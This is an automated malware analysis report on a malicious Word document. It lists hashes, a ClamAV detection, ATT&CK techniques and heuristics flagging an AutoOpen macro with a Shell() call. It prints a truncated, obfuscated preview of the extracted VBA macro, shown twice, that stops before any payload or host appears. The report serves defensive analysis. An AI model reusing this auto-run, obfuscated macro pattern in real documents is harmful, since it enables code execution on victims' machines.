Office (OLE) malware analysis — malicious · b0b066fecf87ef60

MALICIOUS

Office (OLE)

124.2 KB Created: 2018-09-28 14:29:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 82734e4c5f6f9833954666c0e9719f9d SHA-1: 47d55c4c72908bd14467531798234584152e1f57 SHA-256: b0b066fecf87ef60487c1d8a41207f6b9fe488664de710fdeb4233387b6ca26a

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and utilizes the Shell() function, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further stages of malware. The specific obfuscation and truncated nature of the script prevent a more detailed analysis of its exact payload or destination.

Heuristics 6

ClamAV: Doc.Malware.00536d-6700703-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6700703-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 72478 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	72478 bytes
SHA-256: `3658ce6c22b147e9a04a5af77f04a5982f764271613ffbf38dcff8e31b74f53b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "aQDwoqNjHmZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim osfFcV(1) osfFcV(0) = InStr(QwBcvQL + obWjKGmDUCGlbUGmP + UQJzBtkm, ZzwWXw + ZSZAMilQBbKZuKuWKINC + dajHODXc) + InStrRev(fUTEfOKc + QzioERZTZMPiDFkB + hUEfZ, qvwkU + ivrCwlwfdPMMJZbkGii + fcPiY) + InStrRev(vBdEHNh + FZoaPbjOmYAvzVhXW + kEBTLj, vrYXBJ + tSAjUmCTBhEmjqpokZwA + uqjkMw) + InStr(VnEVm + CiHKBMhPrhLUFazVZvVi + uvQsF, tqhqo + BMazsinSvpmMQhAIIG + XbjcSd) Dim GUJHPk(1) GUJHPk(0) = InStrRev(zznGYS + nQOiTwoWOTYbFhiCIiEr + cDuVd, tYZRKPbK + lBQSwrIqVPMAAUqsua + WfCjQTAb) + InStrRev(USpzrdM + nzjhXrJvkRlntnwKzppuY + RjDdMjQ, zpziq + FqarhjDDhBiDIwsZIFR + VZnJEpR) Dim YIWfpw(2) YIWfpw(0) = InStrRev(vIimBW + wRQtVSvkMqLAuLDHPCTjt + GCFKjGPz, SNOGMlVd + PBflawPSchXRaLtikvDHiaz + CQwGl) + InStrRev(FWUjirz + RuwovHUzXzMKdJPP + bmivFWK, swCzMjBA + JdINlSMJGYciUINtpzwEz + KvoibJKj) + InStr(SYwctBBK + PhQWXnOlNZIIQjifOR + hXkRQwvv, NjcfSGn + uIZJoJUdWfKzNinWqSpSfh + jkOXr) + InStrRev(IqHNvH + bYOQNWwSTQMdEqSFosGwn + FsblrOu, tRRIhm + EbzsDzNmBHaUabSAVhcBR + zcKKYBEK) YIWfpw(1) = InStrRev(wlBtN + NmYtTqYQlSOcZiCkbSdG + fPUwP, iNofF + mLmHQlwlPXnqcjjCjnaiZ + LjOlCJS) + InStrRev(PfWpkNMd + cQfKRFwMpLhMaQEANOV + IQNqRVb, zYNfVzj + FimiTDKzIcrwBCAr + rOOHNiZ) Dim ijDzrw(1) ijDzrw(0) = InStrRev(Aafil + tjzmQEoSoWIwNPjDs + KHthI, sGjifQXq + KZvkJpGaBMPzutWssj + waimZGJb) + InStrRev(csTRPBm + hCidIBlXBznUCZbhPzQ + iVpicdUF, azRwZ + VmZZzIptFaEobRwnMGIthr + cchNB) + InStrRev(diAPhMz + YtBzjUcwlYsshwwN + rYHNzmb, aMVwVn + fTHEPQYslIijPmhUtliW + iKLMO) + InStrRev(qwRtI + IjVhBTrLaBboSzzOChFNfC + rlwsL, LKQBU + BzkKnmtjVwuiWpfoQ + MhqkjHnw) Dim TjFcFm(2) TjFcFm(0) = InStr(ZEYAq + OzTIvjvLFlrNZpP + NbDQjPt, vkjwD + JsDSkkuTKEPLisizmvCY + TvQVFj) + InStr(hQzMftch + ZLdEVNznDMjHUXoiBOdA + OkYNpWF, wUnPa + RTAfwIpicnDfiGaHcb + hGUCVC) + InStrRev(ObjzK + fFHjiNjCXBKjpSZvTZdGHmQ + bzkmKP, VsrKz + iUshLvBFPhRBzzlKbkmP + uRDBAk) + InStr(tbnujQ + MfWdztWwZZnsEsPQ + lFiLwIXM, VhBYHsW + OhEaKstiiCUzbZsRAli + qEGbclLW) TjFcFm(1) = InStrRev(QPjiTi + odzOWjzhAETQJkGbRR + fZjhMu, nzVqjv + XDfEKRajrXuNDlwTomBM + cRWutsN) + InStrRev(EOmsMN + BVWALkLwZcnvWSiAEFnz + owXMwtFp, qjlRj + vSkTdhKadMufMNWlnL + XwtWzvj) + InStrRev(tishZT + ABYQsvmVUYuvvmNVk + OuMsAw, ntLUnJbQ + VjibHYXYwvLFcndDzu + jjijbj) + InStrRev(VjSOcs + qUdYZtbjPKWzMiHwudmzn + ZbfMdkA, fRCrnE + MYiXJLTIusXpBzU + WlaVFz) Dim ifSAp(2) ifSAp(0) = InStrRev(VIQhTOuw + XzLZwMuolWTwhwnJzutoD + ChJiI, AGsNijTZ + UcCMiRlGnsZiXpJLl + iUvbDoz) + InStr(ZosTbzwU + wBFGacjGqJOTvhQHhcozz + lpjXsoP, aYOVw + qQfLVzcSjNOPICpruZjwVw + QZSvJNt) + InStrRev(RHPnNCF + BizYQafaIHSKKLEzlEBV + qjaEhX, tzvnsJs + mkqQHTcBwFaXAEZtFCtlc + PAXSuH) + InStrRev(OkVDj + bfYYLwmznjwtzNkq + FjDzEV, SBqHzb + DUuSOYLJLBUlIHnVwUbHB + jmsqLZ) ifSAp(1) = InStrRev(JPwLEhE + sTRmKhwzFRscMAsrTS + ozwDwvj, cmOhtbVE + zTOtjCCEpMYVrmMiBDbR + qwMNZW) + InStr(cBIaGR + rfwfEQXpoJasmXdqEqqiSZ + qjCjudIM, tLZbWw + MhpdFlbwDBBjGjFPIOz + bkvSQdT) + InStrRev(FNRENdQD + EKulnFCRhcwOzOBKKSjIIbt + TcwFwQ, hwHNOj + QGwUpHZsHPlKtRk + iXCwRwUX) + InStr(wjhwsUvT + UZMoAOwnNvNctEz + rkqvLfoE, wzHTUJLN + jXjVBbTUzPvQjiQdVV + zOzWn) Dim MNsOO(1) MNsOO(0) = InStrRev(zrMnww + fhlMkGdZjjBESmStqdWsYB + NwMjRzPv, HSJjoa + iQjEFwjoUJoMSPbEzP + XTlhAjHp) + InStr(qXGHJs + LJvliwErTNSaaIlTQ + jiNbVn, GipvD + lodkvsnchYwjwXXpdQYDnJ + NijjOjj) + InStr(qfkisCot + aMiKrYNQNkpbzLazJQzbahS + kNjJq, UfUoLB + JMAEmSEwwnaIcZlCjQ + zIbrudD) + InStrRev(AwRNh + tRJnNsviXswjlfmAv + XatKfac, uMlJOGqN + fIXloLRMlbjRuitCXST + zCopUip) Dim hqBuI(2) hqBuI(0) = InStrRev(VtsEU + aDjVDlaucmYUmGDaARYtWdw + WkQBZJ, QBjHs + ZIjwOqwQujcKrHCN + LkzLPumu) + InStr(IdSUOu + wjoAHpVBGJcEiNXjnz + BLbbz, wzJjPqLL + futjkOdMMHqKidmofN + NKMSVPZ) + InStrRev(taHFa + kMwmWhnzOkNwvwHfW + sOmRF, CPDGVES + QfEYTGiMfviIzvaUkzEbID + hGCSfjEr) + InStrRev(zpljav + ... (truncated)

SHA-256: 3658ce6c22b147e9a04a5af77f04a5982f764271613ffbf38dcff8e31b74f53b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "aQDwoqNjHmZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim osfFcV(1)
osfFcV(0) = InStr(QwBcvQL + obWjKGmDUCGlbUGmP + UQJzBtkm, ZzwWXw + ZSZAMilQBbKZuKuWKINC + dajHODXc) + InStrRev(fUTEfOKc + QzioERZTZMPiDFkB + hUEfZ, qvwkU + ivrCwlwfdPMMJZbkGii + fcPiY) + InStrRev(vBdEHNh + FZoaPbjOmYAvzVhXW + kEBTLj, vrYXBJ + tSAjUmCTBhEmjqpokZwA + uqjkMw) + InStr(VnEVm + CiHKBMhPrhLUFazVZvVi + uvQsF, tqhqo + BMazsinSvpmMQhAIIG + XbjcSd)
   Dim GUJHPk(1)
GUJHPk(0) = InStrRev(zznGYS + nQOiTwoWOTYbFhiCIiEr + cDuVd, tYZRKPbK + lBQSwrIqVPMAAUqsua + WfCjQTAb) + InStrRev(USpzrdM + nzjhXrJvkRlntnwKzppuY + RjDdMjQ, zpziq + FqarhjDDhBiDIwsZIFR + VZnJEpR)
   Dim YIWfpw(2)
YIWfpw(0) = InStrRev(vIimBW + wRQtVSvkMqLAuLDHPCTjt + GCFKjGPz, SNOGMlVd + PBflawPSchXRaLtikvDHiaz + CQwGl) + InStrRev(FWUjirz + RuwovHUzXzMKdJPP + bmivFWK, swCzMjBA + JdINlSMJGYciUINtpzwEz + KvoibJKj) + InStr(SYwctBBK + PhQWXnOlNZIIQjifOR + hXkRQwvv, NjcfSGn + uIZJoJUdWfKzNinWqSpSfh + jkOXr) + InStrRev(IqHNvH + bYOQNWwSTQMdEqSFosGwn + FsblrOu, tRRIhm + EbzsDzNmBHaUabSAVhcBR + zcKKYBEK)
YIWfpw(1) = InStrRev(wlBtN + NmYtTqYQlSOcZiCkbSdG + fPUwP, iNofF + mLmHQlwlPXnqcjjCjnaiZ + LjOlCJS) + InStrRev(PfWpkNMd + cQfKRFwMpLhMaQEANOV + IQNqRVb, zYNfVzj + FimiTDKzIcrwBCAr + rOOHNiZ)
   Dim ijDzrw(1)
ijDzrw(0) = InStrRev(Aafil + tjzmQEoSoWIwNPjDs + KHthI, sGjifQXq + KZvkJpGaBMPzutWssj + waimZGJb) + InStrRev(csTRPBm + hCidIBlXBznUCZbhPzQ + iVpicdUF, azRwZ + VmZZzIptFaEobRwnMGIthr + cchNB) + InStrRev(diAPhMz + YtBzjUcwlYsshwwN + rYHNzmb, aMVwVn + fTHEPQYslIijPmhUtliW + iKLMO) + InStrRev(qwRtI + IjVhBTrLaBboSzzOChFNfC + rlwsL, LKQBU + BzkKnmtjVwuiWpfoQ + MhqkjHnw)
   Dim TjFcFm(2)
TjFcFm(0) = InStr(ZEYAq + OzTIvjvLFlrNZpP + NbDQjPt, vkjwD + JsDSkkuTKEPLisizmvCY + TvQVFj) + InStr(hQzMftch + ZLdEVNznDMjHUXoiBOdA + OkYNpWF, wUnPa + RTAfwIpicnDfiGaHcb + hGUCVC) + InStrRev(ObjzK + fFHjiNjCXBKjpSZvTZdGHmQ + bzkmKP, VsrKz + iUshLvBFPhRBzzlKbkmP + uRDBAk) + InStr(tbnujQ + MfWdztWwZZnsEsPQ + lFiLwIXM, VhBYHsW + OhEaKstiiCUzbZsRAli + qEGbclLW)
TjFcFm(1) = InStrRev(QPjiTi + odzOWjzhAETQJkGbRR + fZjhMu, nzVqjv + XDfEKRajrXuNDlwTomBM + cRWutsN) + InStrRev(EOmsMN + BVWALkLwZcnvWSiAEFnz + owXMwtFp, qjlRj + vSkTdhKadMufMNWlnL + XwtWzvj) + InStrRev(tishZT + ABYQsvmVUYuvvmNVk + OuMsAw, ntLUnJbQ + VjibHYXYwvLFcndDzu + jjijbj) + InStrRev(VjSOcs + qUdYZtbjPKWzMiHwudmzn + ZbfMdkA, fRCrnE + MYiXJLTIusXpBzU + WlaVFz)
   Dim ifSAp(2)
ifSAp(0) = InStrRev(VIQhTOuw + XzLZwMuolWTwhwnJzutoD + ChJiI, AGsNijTZ + UcCMiRlGnsZiXpJLl + iUvbDoz) + InStr(ZosTbzwU + wBFGacjGqJOTvhQHhcozz + lpjXsoP, aYOVw + qQfLVzcSjNOPICpruZjwVw + QZSvJNt) + InStrRev(RHPnNCF + BizYQafaIHSKKLEzlEBV + qjaEhX, tzvnsJs + mkqQHTcBwFaXAEZtFCtlc + PAXSuH) + InStrRev(OkVDj + bfYYLwmznjwtzNkq + FjDzEV, SBqHzb + DUuSOYLJLBUlIHnVwUbHB + jmsqLZ)
ifSAp(1) = InStrRev(JPwLEhE + sTRmKhwzFRscMAsrTS + ozwDwvj, cmOhtbVE + zTOtjCCEpMYVrmMiBDbR + qwMNZW) + InStr(cBIaGR + rfwfEQXpoJasmXdqEqqiSZ + qjCjudIM, tLZbWw + MhpdFlbwDBBjGjFPIOz + bkvSQdT) + InStrRev(FNRENdQD + EKulnFCRhcwOzOBKKSjIIbt + TcwFwQ, hwHNOj + QGwUpHZsHPlKtRk + iXCwRwUX) + InStr(wjhwsUvT + UZMoAOwnNvNctEz + rkqvLfoE, wzHTUJLN + jXjVBbTUzPvQjiQdVV + zOzWn)
   Dim MNsOO(1)
MNsOO(0) = InStrRev(zrMnww + fhlMkGdZjjBESmStqdWsYB + NwMjRzPv, HSJjoa + iQjEFwjoUJoMSPbEzP + XTlhAjHp) + InStr(qXGHJs + LJvliwErTNSaaIlTQ + jiNbVn, GipvD + lodkvsnchYwjwXXpdQYDnJ + NijjOjj) + InStr(qfkisCot + aMiKrYNQNkpbzLazJQzbahS + kNjJq, UfUoLB + JMAEmSEwwnaIcZlCjQ + zIbrudD) + InStrRev(AwRNh + tRJnNsviXswjlfmAv + XatKfac, uMlJOGqN + fIXloLRMlbjRuitCXST + zCopUip)
   Dim hqBuI(2)
hqBuI(0) = InStrRev(VtsEU + aDjVDlaucmYUmGDaARYtWdw + WkQBZJ, QBjHs + ZIjwOqwQujcKrHCN + LkzLPumu) + InStr(IdSUOu + wjoAHpVBGJcEiNXjnz + BLbbz, wzJjPqLL + futjkOdMMHqKidmofN + NKMSVPZ) + InStrRev(taHFa + kMwmWhnzOkNwvwHfW + sOmRF, CPDGVES + QfEYTGiMfviIzvaUkzEbID + hGCSfjEr) + InStrRev(zpljav +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.